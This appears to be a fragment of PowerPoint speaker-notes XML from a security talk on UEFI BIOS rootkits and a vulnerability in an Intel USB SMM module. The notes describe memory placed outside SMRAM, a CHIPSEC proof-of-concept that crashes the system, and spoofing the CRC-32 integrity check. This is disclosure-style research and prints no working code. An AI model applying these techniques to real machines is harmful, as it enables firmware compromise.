            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>And we start off by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>talking about UEFI BIOS rootkits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Shape 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 29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Shape 595"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>With the help of its GUID in UEFITool, we can find the Uhcd module with the following code segment.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Shape 596"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Shape 59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Shape 603"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Another “little something” from the developer is that the memory of the EfiRuntimeServicesData type is allocated for the structure, which means that the structure is out of the SMRAM region. More precisely, it is located lower than SMRAM, as borne out by the allocation type being equal to AllocateMaxAddress.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604" name="Shape 604"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="605" name="Shape 60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Shape 611"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Shape 612"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Shape 61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Shape 619"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Shape 620"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="621" name="Shape 62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 name="Shape 626"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Shape 627"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>With all the required vulnerability-related information gathered, by using CHIPSEC, it is possible to write a simple proof-of-concept that will stuck the system with Machine Check Exception</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Shape 628"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Shape 62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4" name="Shape 634"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="635" name="Shape 635"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Let’s determine the impact and see how the vulnerability was patched by Intel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="636" name="Shape 636"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 63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1" name="Shape 641"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Shape 642"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="643" name="Shape 643"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="644" name="Shape 64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0" name="Shape 650"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="651" name="Shape 651"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485320" cy="3599280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>First of all, we need to figure out in what cases byte_1B158 takes value 1. Excluding the cases when the byte_1B158 is equated to 1 after the sub_1A80C provides a negative result, it becomes obvious that the sub_5EEC does it unconditionally.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>There is a single xref of sub_5EEC pointing to the following function.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652" name="Shape 652"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970720" cy="457560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Shape 65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8" name="Shape 658"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="659" name="Shape 659"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The function is sent as an argument when a method of an unknown EFI_ACPI_EN_DISPATCH_ PROTOCOL is called, which seems to be a callback. In other words, the sub_5EEC function will be called if a certain event occurs. But what is this event? Search by GUID we found AcpiModeEnable module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>So it is obvious that the sub_5EEC is called when the system jumps in the ACPI mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 660"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="450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ru-RU" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="661" name="Shape 66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Shape 667"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4400640"/>
            <a:ext cx="5485200" cy="3599400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>The pointer we need here is copied to the internal buffer. After that, we can see the following code in the end of the function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>While the system is loading, the CRC-32 hash of a part of the usb_data structure memory region is being calculated and saved. When the SW SMI is called the hash is recalculated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Validation algorithm depends heavily on that cryptographic strength of the CRC-32 algorithm that is...close to zero.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>To spoof CRC-32 hash, we can simply correct 4 consecutive bytes after changing the data we are interested in, by simply using the python script from Project Nayuki.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884760" y="8685360"/>
            <a:ext cx="2970600" cy="457500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
